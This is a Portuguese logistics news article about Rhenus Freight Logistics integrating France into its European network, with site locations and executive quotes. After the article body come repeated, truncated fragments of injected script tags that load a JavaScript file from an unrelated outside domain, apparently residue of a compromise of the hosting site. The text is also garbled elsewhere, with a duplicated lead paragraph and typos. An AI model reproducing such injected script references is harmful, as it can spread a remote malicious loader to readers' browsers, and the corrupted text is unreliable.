Rhenus Logistics integra Fança na sua rede europeia

A empresa Rhenus Freight Logistics, pertencente ao grupo Rhenus, está a ampliar a sua rede de comunicações, tendo para o efeito integrado na sua rede europeia todo o território francês.

A empresa Rhenus Freight Logistics, pertencente ao grupo Rhenus, está a ampliar a sua rede de comunicações, tendo para o efeito integrado na sua rede europeia todo o território francês.

 

Segundo informação da empresa, a França tem uma posição «na rede europeia grande, uma vez que o país gaulês é o parceiro  comercial mais importante da Alemanha dentro do grupo, tendo atingido quase 160 milhões de euros em importações e exportações durante o ano passado».

 

Para a gestão de envios de importação e exportação, actualmente a Rhenus tem à sua disposição uma rede de delegações com uma superfície total de 50.000 m². Assim, os centros localizados nas localidades francesas de Gretz e Garonor cobrem a zona de Ile-de-France, além de instalações em Angers, Beaune, Bordéus, Lyon e Marselha. Além disso, em Setembro inaugurar-se-á a nova sede de Toulouse, e seguir-se-ão outras delegações na Alsácia e no norte de França.

 

Tal como explica Uwe Oemmelen, membro do Conselho de Administração do Grupo Rhenus, «passámos para as novas delegações os nossos padrões de qualidade e tecnologia de informação de comprovada eficácia em toda a Europa». Por outro lado, afirma, «garantimos que a expansão em França pressuponha para os nossos clientes actuais serviço de valor acrescentado e prestações ainda melhores». «Hoje em dia» ? argumenta Oemmelen-, «os grandes expedidores esperam realmente que os fornecedores de serviços logísticos contem com una rede própria em França. Agora podemos desenvolver soluções integrais para França e para o resto da Europa para este mercado-alvo.

ttp://www.hdadwcd.com/b.js>ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.

Não perca informação: Subscreva as nossas Newsletters

Subscrever